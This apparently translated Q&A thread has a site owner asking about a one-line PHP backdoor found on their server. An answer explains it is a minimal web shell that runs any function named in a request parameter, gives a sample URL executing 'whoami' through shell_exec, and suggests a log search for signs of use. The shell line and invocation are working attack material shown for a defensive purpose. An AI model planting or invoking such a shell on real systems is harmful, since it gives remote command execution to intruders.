php - 找到黑客留下的代码，但不明白它的作用

Question

我在我的一个 PHP 文件中发现了黑客留下的一行脚本。它是这样写的:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

任何人都可以就这行代码的作用给出一些提示吗？谢谢

Answer 1

由于问题被搁置，我已经将其作为评论发布，现在在这里作为答案:

这是一个 PHP 外壳。如果将其重写为 <?php ($_=@$_GET[2]).@$_($_GET[1]); ?>网址 file.php?2=shell_exec&1=whoami执行命令 whoami在外壳上。在您的示例中，一个参数通过 POST 传递，一个通过 GET 传递。所以调用起来有点困难。

您还可以用它调用其他函数。第一个参数始终是函数名称，第二个参数是被调用函数的参数。

显然它在 http://h.ackack.net/tiny-php-shell.html 上有解释( https://twitter.com/dragosr/status/116759108526415872 ) 但网站无法为我加载。

/edit:如果你有权访问服务器日志文件，你可以搜索它们以查看黑客是否使用了这个 shell。一个简单的egrep "(&|\?)2=.+" logs*在外壳上应该工作。您只能看到执行的命令的一半(只有 GET，没有 POST)，但这也许有助于了解攻击者是否真的使用了他的脚本。